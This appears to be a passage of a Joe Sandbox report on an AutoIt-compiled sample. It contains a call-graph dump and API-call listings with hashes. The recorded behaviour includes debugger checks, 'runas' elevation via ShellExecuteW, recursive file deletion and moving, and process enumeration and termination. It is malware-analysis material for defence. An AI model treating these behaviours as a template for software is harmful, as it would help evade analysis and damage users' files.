95542 5b9843 59 API calls 95463->95542 95466 5b8dbb 95466->95468 95469 5b8dc7 95466->95469 95467 538e70 52 API calls 95475 5b89a6 95467->95475 95509 5b87e3 95468->95509 95469->95478 95474 5b8c25 95523 550000 95474->95523 95475->95462 95475->95467 95475->95478 95538 594a0c 8 API calls __fread_nolock 95475->95538 95539 5b8e7c 41 API calls _strftime 95475->95539 95478->94972 95479 5b8c5f 95482 537d51 8 API calls 95479->95482 95480 5b8c45 95540 5a3ef6 81 API calls __wsopen_s 95480->95540 95484 5b8c6e 95482->95484 95483 5b8c50 GetCurrentProcess TerminateProcess 95483->95479 95485 5383b0 8 API calls 95484->95485 95486 5b8c87 95485->95486 95488 541c50 8 API calls 95486->95488 95494 5b8caf 95486->95494 95487 5b8e22 95487->95478 95492 5b8e36 FreeLibrary 95487->95492 95489 5b8c9e 95488->95489 95490 5b94da 74 API calls 95489->95490 95490->95494 95491 541c50 8 API calls 95491->95494 95492->95478 95494->95487 95494->95491 95527 5b94da 95494->95527 95541 53b3fe 8 API calls 95494->95541 95497 53c269 8 API calls 95496->95497 95498 5b964d CharLowerBuffW 95497->95498 95543 5996e3 95498->95543 95502 53bf07 8 API calls 95503 5b9689 95502->95503 95504 538685 8 API calls 95503->95504 95505 5b969d 95504->95505 95506 5396d9 8 API calls 95505->95506 95508 5b96a7 _wcslen 95506->95508 95507 5b97bd _wcslen 95507->95475 95508->95507 95550 5b8e7c 41 API calls _strftime 95508->95550 95510 5b87fe 95509->95510 95511 5b8849 95509->95511 95512 55019b 8 API calls 95510->95512 95515 5b99f5 95511->95515 95513 5b8820 95512->95513 95513->95511 95514 55016b 8 API calls 95513->95514 95514->95513 95516 5b9c0a messages 95515->95516 95521 5b9a19 _strcat _wcslen ___std_exception_copy 95515->95521 95516->95474 95517 53c9fb 39 API calls 95517->95521 95518 53c92d 39 API calls 95518->95521 95519 53c5df 39 API calls 95519->95521 95520 538e70 52 API calls 95520->95521 95521->95516 95521->95517 95521->95518 95521->95519 95521->95520 95551 59f7da 10 API calls _wcslen 95521->95551 95524 550015 95523->95524 95525 5500ad ResumeThread 95524->95525 95526 55007b 95524->95526 95525->95526 95526->95479 95526->95480 95528 5b94f2 95527->95528 95531 5b950e 95527->95531 95529 5b951a 95528->95529 95530 5b94f9 95528->95530 95528->95531 95532 5b95c3 95528->95532 95535 536ab6 8 API calls 95529->95535 95552 59f3fd 10 API calls _strlen 95530->95552 95531->95494 95567 5a15b3 72 API calls messages 95532->95567 95535->95531 95536 5b9503 95553 536ab6 95536->95553 95538->95475 95539->95475 95540->95483 95541->95494 95542->95466 95544 599703 _wcslen 95543->95544 95545 5997f2 95544->95545 95546 599738 95544->95546 95547 5997f7 95544->95547 95545->95502 95545->95508 95546->95545 95548 54e2e5 41 API calls 95546->95548 95547->95545 95549 54e2e5 41 API calls 95547->95549 95548->95546 95549->95547 95550->95507 95551->95521 95552->95536 95554 536ac6 95553->95554 95555 57587b 95553->95555 95560 55016b 8 API calls 95554->95560 95556 57588c 95555->95556 95557 5384b7 8 API calls 95555->95557 95558 53bceb 8 API calls 95556->95558 95557->95556 95559 575896 95558->95559 95559->95559 95561 536ad9 95560->95561 95562 536ae2 95561->95562 95563 536af4 95561->95563 95564 53b25f 8 API calls 95562->95564 95565 53bf07 8 API calls 95563->95565 95566 536aea 95564->95566 95565->95566 95566->95531 95567->95531 95569 55019b 8 API calls 95568->95569 95570 537a39 95569->95570 95571 55016b 8 API calls 95570->95571 95572 537a47 95571->95572 95572->94980 95574 53bf07 8 API calls 95573->95574 95575 599b6d 95574->95575 95576 537a14 8 API calls 95575->95576 95577 599b81 95576->95577 95578 5996e3 41 API calls 95577->95578 95584 599ba3 95577->95584 95580 599b9d 95578->95580 95579 5996e3 41 API calls 95579->95584 95581 538685 8 API calls 95580->95581 95580->95584 95581->95584 95582 538685 8 API calls 95582->95584 95583 537af4 8 API calls 95583->95584 95584->95579 95584->95582 95584->95583 95585 599c42 95584->95585 95587 599c26 95584->95587 95586 53be6d 8 API calls 95585->95586 95588 599c51 95585->95588 95586->95588 95589 538685 8 API calls 95587->95589 95588->95007 95590 599c36 95589->95590 95591 537af4 8 API calls 95590->95591 95591->95585 95593 537a65 95592->95593 95594 537a9e 95592->95594 95596 55016b 8 API calls 95593->95596 95595 53be6d 8 API calls 95594->95595 95597 537a78 95594->95597 95595->95597 95596->95597 95597->95005 95608 59e723 95598->95608 95600 59dce9 Process32NextW 95601 59dd9b CloseHandle 95600->95601 95606 59dce2 95600->95606 95601->95013 95602 53bf07 8 API calls 95602->95606 95603 53b25f 8 API calls 95603->95606 95604 53694e 8 API calls 95604->95606 95605 537af4 8 API calls 95605->95606 95606->95600 95606->95601 95606->95602 95606->95603 95606->95604 95606->95605 95607 54e2e5 41 API calls 95606->95607 95607->95606 95609 59e72e 95608->95609 95610 59e745 95609->95610 95613 59e74b 95609->95613 95614 556742 GetStringTypeW _strftime 95609->95614 95615 55668b 39 API calls _strftime 95610->95615 95613->95606 95614->95609 95615->95613 95648 5a01bf 52 API calls _strftime 95616->95648 95618 5a02a8 95619 5a0308 95618->95619 95620 5a0320 95618->95620 95642 5a02ae __fread_nolock 95618->95642 95649 5a04fe 56 API calls __fread_nolock 95619->95649 95622 5a0386 95620->95622 95625 5a0330 95620->95625 95623 5a041c 95622->95623 95624 5a03b6 95622->95624 95622->95642 95628 5a04c5 95623->95628 95629 5a0425 95623->95629 95626 5a03bb 95624->95626 95627 5a03e6 95624->95627 95630 5a0368 95625->95630 95633 5a276a 10 API calls 95625->95633 95626->95642 95651 53c9fb 39 API calls 95626->95651 95627->95642 95652 53c9fb 39 API calls 95627->95652 95628->95642 95656 53c5df 39 API calls 95628->95656 95631 5a042a 95629->95631 95632 5a04a2 95629->95632 95650 5a1759 8 API calls ___scrt_fastfail 95630->95650 95637 5a0469 95631->95637 95638 5a0430 95631->95638 95632->95642 95655 53c5df 39 API calls 95632->95655 95643 5a033c 95633->95643 95637->95642 95654 53c5df 39 API calls 95637->95654 95638->95642 95653 53c5df 39 API calls 95638->95653 95642->95026 95645 5a276a 10 API calls 95643->95645 95646 5a0353 __fread_nolock 95645->95646 95647 5a276a 10 API calls 95646->95647 95647->95630 95648->95618 95649->95642 95650->95642 95651->95642 95652->95642 95653->95642 95654->95642 95655->95642 95656->95642 95658 54c003 95657->95658 95660 54bfc7 95657->95660 95659 53bceb 8 API calls 95658->95659 95669 59d2ab 95659->95669 95660->95658 95661 54bfd6 95660->95661 95663 54bfeb 95661->95663 95665 54bff8 95661->95665 95662 59d2da 95662->95085 95675 54c009 95663->95675 95664 59d249 2 API calls 95664->95669 95682 59d3b2 12 API calls 95665->95682 95667 54bff4 95667->95085 95669->95662 95669->95664 95683 53acc0 8 API calls __fread_nolock 95669->95683 95671->95097 95672->95101 95673->95053 95674->95092 95676 54c1f1 8 API calls 95675->95676 95677 54c021 95676->95677 95684 53adc1 95677->95684 95680 538774 10 API calls 95681 54c03c 95680->95681 95681->95667 95682->95667 95683->95669 95690 54feaa 95684->95690 95686 53ae07 95686->95680 95686->95681 95687 53b050 2 API calls 95688 53add2 95687->95688 95688->95686 95688->95687 95697 53b0e3 8 API calls __fread_nolock 95688->95697 95691 58fe13 95690->95691 95692 54febb 95690->95692 95693 55016b 8 API calls 95691->95693 95692->95688 95694 58fe1d 95693->95694 95695 55019b 8 API calls 95694->95695 95696 58fe32 95695->95696 95697->95688 95699 5722f0 __wsopen_s 95698->95699 95700 59e790 GetShortPathNameW 95699->95700 95701 5384b7 8 API calls 95700->95701 95702 59e7b8 95701->95702 95702->95113 95702->95115 95703->94771 95704->94771 95705->94776 95706->94772

                                                                                                                                                      Executed Functions

                                                                                                                                                      Function 00535D78 Relevance: 23.0, APIs: 9, Strings: 4, Instructions: 235libraryloaderCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 278 535d78-535de7 call 53bf07 GetVersionExW call 5384b7 283 574f0c-574f1f 278->283 284 535ded 278->284 285 574f20-574f24 283->285 286 535def-535df1 284->286 287 574f27-574f33 285->287 288 574f26 285->288 289 535df7-535e56 call 5396d9 call 5379ed 286->289 290 574f4b 286->290 287->285 291 574f35-574f37 287->291 288->287 303 5750ad-5750b4 289->303 304 535e5c-535e5e 289->304 294 574f52-574f5e 290->294 291->286 293 574f3d-574f44 291->293 293->283 296 574f46 293->296 297 535ecc-535ee6 GetCurrentProcess IsWow64Process 294->297 296->290 299 535f45-535f4b 297->299 300 535ee8 297->300 302 535eee-535efa 299->302 300->302 309 535f00-535f0f LoadLibraryA 302->309 310 5750f2-5750f6 GetSystemInfo 302->310 307 5750b6 303->307 308 5750d4-5750d7 303->308 305 535e64-535e67 304->305 306 574fae-574fc1 304->306 305->297 311 535e69-535eab 305->311 312 574fc3-574fcc 306->312 313 574fea-574fec 306->313 314 5750bc 307->314 315 5750c2-5750ca 308->315 316 5750d9-5750e8 308->316 317 535f11-535f1f GetProcAddress 309->317 318 535f4d-535f57 GetSystemInfo 309->318 311->297 320 535ead-535eb0 311->320 321 574fce-574fd4 312->321 322 574fd9-574fe5 312->322 323 575021-575024 313->323 324 574fee-575003 313->324 314->315 315->308 316->314 325 5750ea-5750f0 316->325 317->318 326 535f21-535f25 GetNativeSystemInfo 317->326 319 535f27-535f29 318->319 333 535f32-535f44 319->333 334 535f2b-535f2c FreeLibrary 319->334 327 574f63-574f6d 320->327 328 535eb6-535ec0 320->328 321->297 322->297 331 575026-575041 323->331 332 57505f-575062 323->332 329 575005-57500b 324->329 330 575010-57501c 324->330 325->315 326->319 338 574f80-574f8a 327->338 339 574f6f-574f7b 327->339 328->294 335 535ec6 328->335 329->297 330->297 336 575043-575049 331->336 337 57504e-57505a 331->337 332->297 340 575068-57508f 332->340 334->333 335->297 336->297 337->297 341 574f9d-574fa9 338->341 342 574f8c-574f98 338->342 339->297 343 575091-575097 340->343 344 57509c-5750a8 340->344 341->297 342->297 343->297 344->297
                                                                                                                                                      APIs
                                                                                                                                                      • GetVersionExW.KERNEL32(?), ref: 00535DA7
                                                                                                                                                        • Part of subcall function 005384B7: _wcslen.LIBCMT ref: 005384CA
                                                                                                                                                      • GetCurrentProcess.KERNEL32(?,005CDC2C,00000000,?,?), ref: 00535ED3
                                                                                                                                                      • IsWow64Process.KERNEL32(00000000,?,?), ref: 00535EDA
                                                                                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00535F05
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00535F17
                                                                                                                                                      • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00535F25
                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?), ref: 00535F2C
                                                                                                                                                      • GetSystemInfo.KERNEL32(?,?,?), ref: 00535F51
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                                                                                                                      • String ID: GetNativeSystemInfo$kernel32.dll$|O$
                                                                                                                                                      • API String ID: 3290436268-1104098451
                                                                                                                                                      • Opcode ID: 58390a5721ac6d41bd95156a034179a531393960a57965744cb3b3d7c81adba4
                                                                                                                                                      • Instruction ID: 62e233db4eef6a0f4d891e4c9330ecfdc6a6681ec31a7163a7cb707ec5231007
                                                                                                                                                      • Opcode Fuzzy Hash: 58390a5721ac6d41bd95156a034179a531393960a57965744cb3b3d7c81adba4
                                                                                                                                                      • Instruction Fuzzy Hash: D1A1A53188A7E2CFC71ECB687C6C59B7F667F26700B14BC99D48593261D2684948DB31
                                                                                                                                                      Function 00533312 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 148windowCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,005332EF,?), ref: 00533342
                                                                                                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,005332EF,?), ref: 00533355
                                                                                                                                                      • GetFullPathNameW.KERNEL32(00007FFF,?,?,00602418,00602400,?,?,?,?,?,?,005332EF,?), ref: 005333C1
                                                                                                                                                        • Part of subcall function 005384B7: _wcslen.LIBCMT ref: 005384CA
                                                                                                                                                        • Part of subcall function 005341E6: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,005333E9,00602418,?,?,?,?,?,?,?,005332EF,?), ref: 00534227
                                                                                                                                                      • SetCurrentDirectoryW.KERNELBASE(?,00000001,00602418,?,?,?,?,?,?,?,005332EF,?), ref: 00533442
                                                                                                                                                      • MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 00573C8A
                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?,00602418,?,?,?,?,?,?,?,005332EF,?), ref: 00573CCB
                                                                                                                                                      • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,005F31F4,00602418,?,?,?,?,?,?,?,005332EF), ref: 00573D54
                                                                                                                                                      • ShellExecuteW.SHELL32(00000000,?,?), ref: 00573D5B
                                                                                                                                                        • Part of subcall function 0053345A: GetSysColorBrush.USER32(0000000F), ref: 00533465
                                                                                                                                                        • Part of subcall function 0053345A: LoadCursorW.USER32(00000000,00007F00), ref: 00533474
                                                                                                                                                        • Part of subcall function 0053345A: LoadIconW.USER32(00000063), ref: 0053348A
                                                                                                                                                        • Part of subcall function 0053345A: LoadIconW.USER32(000000A4), ref: 0053349C
                                                                                                                                                        • Part of subcall function 0053345A: LoadIconW.USER32(000000A2), ref: 005334AE
                                                                                                                                                        • Part of subcall function 0053345A: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 005334C6
                                                                                                                                                        • Part of subcall function 0053345A: RegisterClassExW.USER32(?), ref: 00533517
                                                                                                                                                        • Part of subcall function 0053353A: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00533568
                                                                                                                                                        • Part of subcall function 0053353A: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00533589
                                                                                                                                                        • Part of subcall function 0053353A: ShowWindow.USER32(00000000,?,?,?,?,?,?,005332EF,?), ref: 0053359D
                                                                                                                                                        • Part of subcall function 0053353A: ShowWindow.USER32(00000000,?,?,?,?,?,?,005332EF,?), ref: 005335A6
                                                                                                                                                        • Part of subcall function 005338F2: Shell_NotifyIconW.SHELL32(00000000,?), ref: 005339C3
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcslen
                                                                                                                                                      • String ID: 0$`$AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas$s
                                                                                                                                                      • API String ID: 683915450-504931051
                                                                                                                                                      • Opcode ID: 7f0e26c7b2c0627dcaf21bbb2732ea190406ee769e349e0ae01564cf14b7df15
                                                                                                                                                      • Instruction ID: 5a256ca5e313c3fdaf7f5b16fe1eacca4f2a15a983fc92fab58510e82454b25f
                                                                                                                                                      • Opcode Fuzzy Hash: 7f0e26c7b2c0627dcaf21bbb2732ea190406ee769e349e0ae01564cf14b7df15
                                                                                                                                                      • Instruction Fuzzy Hash: 3B51D330148387AECB16EF60EC5DD6B7FE9BFD0714F40582DF581921A2DA748A49E722
                                                                                                                                                      Function 005A9F9F Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 409 5a9f9f-5a9fc7 FindFirstFileW 410 5aa03a-5aa045 FindClose 409->410 411 5a9fc9-5a9fde call 5555c2 409->411 412 5aa04b-5aa05e FindFirstFileW 410->412 413 5aa0e2 410->413 420 5aa028-5aa038 FindNextFileW 411->420 421 5a9fe0-5a9ff5 call 5555c2 411->421 415 5aa0d9 412->415 416 5aa060-5aa066 412->416 417 5aa0e4-5aa0e8 413->417 422 5aa0db-5aa0dc FindClose 415->422 419 5aa069-5aa070 416->419 423 5aa072-5aa087 call 5555c2 419->423 424 5aa0c7-5aa0d7 FindNextFileW 419->424 420->410 420->411 421->420 429 5a9ff7-5aa020 GetFileAttributesW SetFileAttributesW 421->429 422->413 423->424 430 5aa089-5aa09e call 5555c2 423->430 424->415 424->419 431 5aa0eb-5aa0f4 FindClose 429->431 432 5aa026 429->432 430->424 435 5aa0a0-5aa0be SetCurrentDirectoryW call 5a9f9f 430->435 431->417 432->420 438 5aa0c0-5aa0c5 SetCurrentDirectoryW 435->438 439 5aa0f6-5aa0f8 435->439 438->424 439->422
                                                                                                                                                      APIs
                                                                                                                                                      • FindFirstFileW.KERNELBASE(?,?,75568FB0,?,00000000), ref: 005A9FC0
                                                                                                                                                      • GetFileAttributesW.KERNELBASE(?), ref: 005A9FFE
                                                                                                                                                      • SetFileAttributesW.KERNELBASE(?,?), ref: 005AA018
                                                                                                                                                      • FindNextFileW.KERNELBASE(00000000,?), ref: 005AA030
                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 005AA03B
                                                                                                                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 005AA057
                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 005AA0A7
                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(005F7B94), ref: 005AA0C5
                                                                                                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 005AA0CF
                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 005AA0DC
                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 005AA0EC
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                                                      • String ID: *.*
                                                                                                                                                      • API String ID: 1409584000-438819550
                                                                                                                                                      • Opcode ID: 442c8bd04b876d645e81a755c476fd51780da3c488fc0b0f300f876ba4e05638
                                                                                                                                                      • Instruction ID: 1845098c3de81b925a958075d33cd55d77d34aa5d707e5c4233ff404016e5bf7
                                                                                                                                                      • Opcode Fuzzy Hash: 442c8bd04b876d645e81a755c476fd51780da3c488fc0b0f300f876ba4e05638
                                                                                                                                                      • Instruction Fuzzy Hash: 3631B23660161D6EDB109FA4DC4DEEE7BBCBF4A320F1040A5E915E3090EB34DA48DA61
                                                                                                                                                      Function 0059D836 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 2273 59d836-59d894 call 53bf07 * 3 call 53557e * 2 call 59e958 call 59e9c5 2288 59d89f-59d8a9 call 59e9c5 2273->2288 2289 59d896-59d89a call 5365a4 2273->2289 2293 59d8ab-59d8af call 5365a4 2288->2293 2294 59d8b4-59d8f2 call 53bf07 * 2 call 53694e FindFirstFileW 2288->2294 2289->2288 2293->2294 2302 59d8f8 2294->2302 2303 59da23-59da2a FindClose 2294->2303 2305 59d8fe-59d900 2302->2305 2304 59da2d-59da5b call 53bd2c * 5 2303->2304 2305->2303 2307 59d906-59d90d 2305->2307 2309 59d9ef-59da02 FindNextFileW 2307->2309 2310 59d913-59d979 call 53b25f call 59df85 call 53bd2c call 537af4 call 5365a4 call 59dc8e 2307->2310 2309->2305 2313 59da08-59da0d 2309->2313 2332 59d97b-59d97e 2310->2332 2333 59d99f-59d9a3 2310->2333 2313->2305 2334 59da12-59da21 FindClose call 53bd2c 2332->2334 2335 59d984-59d99b call 54e2e5 2332->2335 2336 59d9d1-59d9d7 call 59da5c 2333->2336 2337 59d9a5-59d9a8 2333->2337 2334->2304 2347 59d9ad-59d9b6 MoveFileW 2335->2347 2350 59d99d DeleteFileW 2335->2350 2344 59d9dc 2336->2344 2341 59d9b8-59d9c8 call 59da5c 2337->2341 2342 59d9aa 2337->2342 2341->2334 2351 59d9ca-59d9cf DeleteFileW 2341->2351 2342->2347 2348 59d9df-59d9e1 2344->2348 2347->2348 2348->2334 2352 59d9e3-59d9eb call 53bd2c 2348->2352 2350->2333 2351->2348 2352->2309
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0053557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00535558,?,?,00574B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 0053559E
                                                                                                                                                        • Part of subcall function 0059E9C5: GetFileAttributesW.KERNELBASE(?,0059D755), ref: 0059E9C6
                                                                                                                                                      • FindFirstFileW.KERNELBASE(?,?), ref: 0059D8E2
                                                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 0059D99D
                                                                                                                                                      • MoveFileW.KERNEL32(?,?), ref: 0059D9B0
                                                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,?), ref: 0059D9CD
                                                                                                                                                      • FindNextFileW.KERNELBASE(00000000,00000010), ref: 0059D9F7
                                                                                                                                                        • Part of subcall function 0059DA5C: CopyFileExW.KERNELBASE(?,?,00000000,00000000,00000000,00000008,?,?,0059D9DC,?,?), ref: 0059DA72
                                                                                                                                                      • FindClose.KERNEL32(00000000,?,?,?), ref: 0059DA13
                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 0059DA24
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                                                                                                                      • String ID: \*.*
                                                                                                                                                      • API String ID: 1946585618-1173974218
                                                                                                                                                      • Opcode ID: 4e370c04815d83f26e76c37507993c43e66121a113292c5e8e2129dfe17b9c5c
                                                                                                                                                      • Instruction ID: 0ad69d8638989448622964abac99dde5a15334bfbbe367cf4fc497def562d155
                                                                                                                                                      • Opcode Fuzzy Hash: 4e370c04815d83f26e76c37507993c43e66121a113292c5e8e2129dfe17b9c5c
                                                                                                                                                      • Instruction Fuzzy Hash: 14616D3180114EAFDF01EBA0DA46AEDBFB5BF55300F244069E406B7192EB316F09DB60
                                                                                                                                                      Function 0059DB69 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0053557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00535558,?,?,00574B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 0053559E
                                                                                                                                                        • Part of subcall function 0059E9C5: GetFileAttributesW.KERNELBASE(?,0059D755), ref: 0059E9C6
                                                                                                                                                      • FindFirstFileW.KERNELBASE(?,?), ref: 0059DBE0
                                                                                                                                                      • DeleteFileW.KERNELBASE(?,?,?,?), ref: 0059DC30
                                                                                                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 0059DC41
                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 0059DC58
                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 0059DC61
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                                                                                      • String ID: \*.*
                                                                                                                                                      • API String ID: 2649000838-1173974218
                                                                                                                                                      • Opcode ID: 58ca673259f87bca51e2acb212dcd08db17117d4cb8d9054154d22ab88e79d97
                                                                                                                                                      • Instruction ID: 3278f63895ea93b2e5e1ea80caa0ed7b88fb7e1e41c06343e8e9a24436b46cf2
                                                                                                                                                      • Opcode Fuzzy Hash: 58ca673259f87bca51e2acb212dcd08db17117d4cb8d9054154d22ab88e79d97
                                                                                                                                                      • Instruction Fuzzy Hash: CF318031008386AFC701EF64C8959AFBBF8BE95300F444D2DF5D2921A1EB61DE09DB62
                                                                                                                                                      Function 0059DC9C Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 0059DCC1
                                                                                                                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 0059DCCF
                                                                                                                                                      • Process32NextW.KERNEL32(00000000,?), ref: 0059DCEF
                                                                                                                                                      • CloseHandle.KERNELBASE(00000000), ref: 0059DD9C
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
